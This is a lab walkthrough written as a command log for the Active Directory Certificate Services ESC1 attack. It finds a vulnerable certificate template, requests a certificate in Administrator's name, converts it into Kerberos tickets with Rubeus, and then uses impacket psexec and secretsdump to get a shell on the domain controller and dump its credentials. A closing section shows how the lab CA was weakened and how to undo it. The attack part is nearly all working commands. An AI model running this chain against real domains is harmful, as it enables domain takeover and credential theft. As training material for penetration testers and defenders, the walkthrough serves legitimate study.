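# AD CS ESC1 walkthrough (lab notes). This is a command log, not a runnable
# script: [Windows] lines run in cmd/PowerShell on a domain-joined host,
# [Linux] lines run on the attacking host. Do not pipe this file to bash.

# --- [Windows] Recon ----------------------------------------------------------
# Read the CA policy-module flags. EDITF_ATTRIBUTESUBJECTALTNAME2 showing up here
# is the ESC6 misconfiguration (SAN via request attribute on ANY template); the
# lab enables it at the bottom of this file.
certutil -getreg policy\EditFlags
# Enumerate templates Certify flags as abusable. The finding used below is ESC1:
# the enrollee supplies the subject/SAN, and the template allows client auth.
certify.exe find /vulnerable
# (Certify output excerpt)
# msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

# --- [Windows] Request a certificate for another principal --------------------
# Request Vuln-Cert with a SAN of "Administrator". CA name and template are
# copied from the Certify output. NOTE(review): the doubled backslashes look like
# markdown escaping — cmd/PowerShell expect a single "\" (compare certutil above).
.\\Certify.exe request /ca:DC01.test.local\\test-DC01-CA /template:Vuln-Cert /altname:Administrator
# (Certify output excerpt)
# CA Name : DC01.test.local\\test-DC01-CA
# Template Name : Vuln-Cert

# --- [Linux or Windows] Package the certificate -------------------------------
# Save the whole block Certify prints (the RSA PRIVATE KEY *and* the CERTIFICATE)
# to cert.pem: "-export" needs the private key, not just the certificate.
# openssl prompts for an export password; remember it for Rubeus (/password:).
# -keyex / -CSP tag the key for the legacy Microsoft provider so Windows imports it.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# --- [Windows] PKINIT: certificate -> TGT -> service ticket -------------------
# Authenticate as Administrator with the PFX (add /password:<pfx pw> if one was
# set). /ptt injects the TGT into the session; /nowrap prints the base64 kirbi on
# a single line so it can be copied.
.\\Rubeus.exe asktgt /user:Administrator /ptt /nowrap /certificate:cert.pfx
# Request a CIFS service ticket for the DC. <base64 here> is the TGT printed by
# asktgt above; save the base64 ticket this command prints as cifs.b64.
.\\rubeus.exe asktgs /nowrap /user:Administrator /service:cifs/dc01.test.local /ticket:<base64 here>

# --- [Linux] Use the ticket with impacket -------------------------------------
# Rubeus was misbehaving at this point, so the rest is done with impacket:
# decode the kirbi, convert it to a ccache and point KRB5CCNAME at it.
base64 -d cifs.b64 > cifs.kirbi
impacket-ticketConverter cifs.kirbi cifs.ccache
export KRB5CCNAME=cifs.ccache
# -k -no-pass: authenticate with the ccache. The target hostname must match the
# ticket's SPN (dc01.test.local); -target-ip/-dc-ip supply the address so name
# resolution is not required.
# NOTE(review): this ccache holds only a cifs/ service ticket. psexec (SMB) can
# use it directly, but secretsdump -just-dc talks DRSUAPI over RPC and may need a
# ticket for a different SPN — if it fails, convert the TGT from asktgt instead
# and let impacket request the service tickets it needs.
impacket-psexec -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]
impacket-secretsdump -just-dc -dc-ip 192.168.179.3 -target-ip 192.168.179.3 -k -no-pass test.local/[email protected]

# --- [Windows, CA host] Lab setup only ----------------------------------------
# How the lab CA was weakened (ESC6): any enrollee may add a SAN via request
# attributes. certsvc must be restarted for the flag to take effect. Never run
# this on a production CA; the remediation is the same command with "-" instead
# of "+" (then restart certsvc).
certutil -setreg policy\\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
# Lab build reference: https://www.petenetlive.com/KB/Article/0001128 (password abc)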